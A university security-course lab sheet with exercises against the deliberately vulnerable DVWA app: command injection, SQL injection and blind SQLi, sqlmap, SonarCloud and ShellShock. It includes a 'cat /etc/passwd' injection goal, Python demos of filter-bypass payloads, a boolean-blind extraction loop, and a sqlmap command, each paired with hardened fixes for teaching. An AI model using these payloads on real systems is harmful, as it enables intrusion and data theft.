QSES - Laboratory Exercises 1

Author: Eduardo R. B. Marques, DCC/FCUP

QSES homepage

Exercises marked with (C) will be covered in class, and exercises marked with (H) are left as homework.

1. DVWA command injection (C)

Aim: experiment with DVWA to understand command injection vulnerabilities, and related input validation for each DVWA security level.

  1. Access the DVWA server instance that will be running (temporarily) during class at http://qses.dnsabr.com.
  2. You may login with user name admin and password password.

  3. Access the Command Injection page using the menu on the left. It lets you enter an IP address (e.g. 127.0.0.1); the DVWA server then runs the ping command against that address and reports the command's output.

  4. Exploit the vulnerability by supplying malicious input that injects the execution of the command

    cat /etc/passwd
  5. Change the DVWA Security Level (initially set to Low) and repeat step 4 for the Medium, High and finally the Impossible security levels, noting which parts of the input each level filters.
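To see why the injection in step 4 works and what a correct fix looks like, here is an added example (not DVWA's code). It models the vulnerable pattern of building a shell command by string concatenation, a blacklist filter modelled on DVWA's Medium level (the two stripped tokens are an assumption about that level), and a hardened handler that validates the input as an IP address and runs the program with an argument list so no shell ever parses it. `echo` stands in for `ping` so the script runs offline; the payloads are constructed.

```python
"""Command injection: string-built shell command vs. validated argv.

Added example, not DVWA code. filter_medium is modelled on DVWA's Medium
blacklist (assumption); 'echo pong' replaces 'ping -c 4' so it runs offline.
"""
import ipaddress
import subprocess


def filter_low(target: str) -> str:
    # Low level: the input is used as-is.
    return target


def filter_medium(target: str) -> str:
    # Medium level (assumed): strip two shell separators, in this order.
    # Because ";" is removed after "&&", the input "&;&" collapses to "&&".
    for bad in ("&&", ";"):
        target = target.replace(bad, "")
    return target


def vulnerable_ping(target: str, filt=filter_low) -> str:
    """Builds the command text by concatenation and hands it to /bin/sh."""
    cmd = "echo pong " + filt(target)  # DVWA: shell_exec('ping -c 4 ' . $target)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def safe_ping(target: str) -> str:
    """Whitelist validation plus an argv list: nothing is parsed by a shell."""
    try:
        ip = ipaddress.ip_address(target)  # ValueError for anything but an IP
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}")
    # The validated string is passed as one argument to execvp; even shell
    # metacharacters (which an IP cannot contain) would not be interpreted.
    return subprocess.run(["echo", "pong", str(ip)],
                          capture_output=True, text=True).stdout


# Constructed payloads: each tries to get a second command ("echo INJECTED") run.
PAYLOADS = {
    "plain":     "127.0.0.1",
    "semicolon": "127.0.0.1; echo INJECTED",
    "pipe":      "127.0.0.1 | echo INJECTED",     # survives the medium blacklist
    "split_and": "127.0.0.1 &;& echo INJECTED",   # becomes "&&" after filtering
}


def injected(output: str) -> bool:
    """True when the injected command ran, i.e. INJECTED appears on its own line."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    for level, filt in (("low", filter_low), ("medium", filter_medium)):
        for name, payload in PAYLOADS.items():
            print(f"{level:6} {name:10} injected={injected(vulnerable_ping(payload, filt))}")
    for name, payload in PAYLOADS.items():
        try:
            safe_ping(payload)
            print(f"safe   {name:10} accepted")
        except ValueError as err:
            print(f"safe   {name:10} rejected ({err})")
```

The medium-style blacklist only stops the literal `;` payload: a pipe, or `&;&`, still reaches the shell as a second command. The hardened handler rejects everything that is not an IP address before any process is started, which is the approach to compare against DVWA's Impossible level.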

2. SonarCloud analysis of DVWA command injection (C)

Aim: observe issues detected through static code analysis using SonarCloud for the DVWA command injection example.

  1. Open https://sonarcloud.io/dashboard?id=QSES_DVWA in your browser.

  2. Access the Code tab, then browse the vulnerabilities/exec/ source folder → direct link.

  3. Click on low.php, where 2 security vulnerabilities were detected, each corresponding to a call to shell_exec.

You will notice that command injection vulnerabilities are reported for low.php but not for the remaining levels. The analysis only flags the cases where external input reaches the shell_exec call directly, with no intervening input validation; once any filtering sits between the input and the call, the sanitizer is assumed to be adequate and the finding disappears, even where the filter can be bypassed.

3. DVWA and SQLi (C)

Aim: again using DVWA, understand SQL injection vulnerabilities and the related input validation for each DVWA security level.

Consider DVWA's SQL injection and Blind SQL injection pages, and:

  1. As in exercise 1, examine the input validation mechanisms and try to exploit the vulnerabilities.
  2. As in exercise 2, browse the SonarCloud reports to observe what SQL injection vulnerabilities have been identified through static analysis.
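To make the SQL injection and Blind SQL injection pages concrete, here is an added example (not DVWA's code) using SQLite in place of MySQL. The table and rows are constructed; the vulnerable lookup mirrors the shape of DVWA's low-level query (`WHERE user_id = '<input>'`). It contrasts that lookup with a parameterised one, and then recovers a secret through a boolean-based blind loop, which is the kind of inference a tool like sqlmap (exercise 5) automates.

```python
"""SQL injection: string-built query vs. bound parameter, plus a
boolean-based blind extraction loop.

Added example, not DVWA code; the users table is constructed sample data.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                "first_name TEXT, last_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin", "s3cret-hash"),     # constructed rows
        (2, "Gordon", "Brown", "gordon-hash"),
        (3, "Hack", "Me", "hack-hash"),
    ])
    return con


def lookup_vulnerable(con, user_id: str):
    """The input is pasted into the SQL text, so a quote in it ends the literal."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user_id: str):
    """Type check plus bound parameter: the input is data, never SQL."""
    uid = int(user_id)  # ValueError for "1' OR '1'='1"
    return con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (uid,)
    ).fetchall()


def blind_extract(con, subquery: str, max_len: int = 64):
    """Recover the string produced by `subquery` one character at a time.

    The only signal is whether the row for user 1 comes back (true/false).
    Each probe asks "is the code point of character i greater than mid?",
    so a character costs about seven requests (binary search over 0..127).
    """
    queries = 0
    result = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # coalesce(..., 0): past the end substr() is '' and unicode('') is
            # NULL, so every probe is false and the search settles on 0.
            payload = (f"1' AND coalesce(unicode(substr(({subquery}), {i}, 1)), 0)"
                       f" > {mid} -- ")
            queries += 1
            if lookup_vulnerable(con, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # no character at this position: end of string
            break
        result += chr(lo)
    return result, queries


if __name__ == "__main__":
    con = make_db()
    print("tautology:", lookup_vulnerable(con, "' OR '1'='1"))   # every row
    print("union:", lookup_vulnerable(
        con, "' UNION SELECT user_id, password FROM users -- "))
    secret, n = blind_extract(con, "SELECT password FROM users WHERE user_id = 1")
    print(f"blind: {secret!r} in {n} requests")
    try:
        lookup_safe(con, "' OR '1'='1")
    except ValueError as err:
        print("safe lookup rejected the input:", err)
```

On the non-blind page the tautology and UNION payloads return data directly; on the blind page only the yes/no signal is available, and the extraction loop above shows that this is enough to read any value the query's user can see, one bit per request.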

4. Set up Docker and run a DVWA container (H)

Aim: use your PC to run DVWA (and other tools in the future) using Docker.

  1. Install Docker Desktop (Windows or macOS) or Docker Engine (Linux).
  2. Run the DVWA Docker image using the following Docker command:

    docker run --rm -it -p 9999:80 vulnerables/web-dvwa

    The -p 9999:80 option publishes port 80 of the DVWA container on port 9999 of the host (host port first, container port second). You may use another host port in place of 9999.

  3. Open your browser and access http://127.0.0.1:9999.

5. Pen-testing for SQLi using sqlmap (H)

  1. You must have Python installed.
  2. Download sqlmap.
  3. Conduct a pen-test over DVWA, e.g.

    python ./sqlmap.py \
    -u "http://127.0.0.1:9999/vulnerabilities/sqli/?id=2&Submit=Submit" \
    --cookie="PHPSESSID=. . . . .; security=low" \
    -b --current-db --current-user

    You must fill in the value of PHPSESSID above (the `?` before `id=2` is required, otherwise the parameters are not part of the query string). To find the session id, access the PHP Info page and consult the PHP Variables section, or read the cookie from your browser's developer tools. The security=low cookie value selects the security level sqlmap will test against.

6. Set up GitHub and SonarCloud accounts (H)

Aim: familiarize yourself with basic aspects of SonarCloud setup in integration with GitHub, again using DVWA as an example.

  1. Create a GitHub account if you don't have one.
  2. Log in to GitHub.
  3. Fork the DVWA repository available at https://github.com/qses/DVWA. After this step, a DVWA repository will exist in your account.
  4. Sign up for SonarCloud using the GitHub login option.
  5. Follow the instructions to create a SonarCloud project and select your DVWA repository for analysis. Note that the forked repository already contains a .sonarcloud.properties file, so you do not need to create a new one.
  6. Once the project setup is done, the SonarCloud automated analysis will begin and take a few minutes. Wait until it finishes, and then browse the generated reports.

7. Experiment with ShellShock (H)

Aim: experiment with a real-world example of command injection.

See instructions here on how to run a Docker container that is vulnerable to ShellShock and exploit the vulnerability.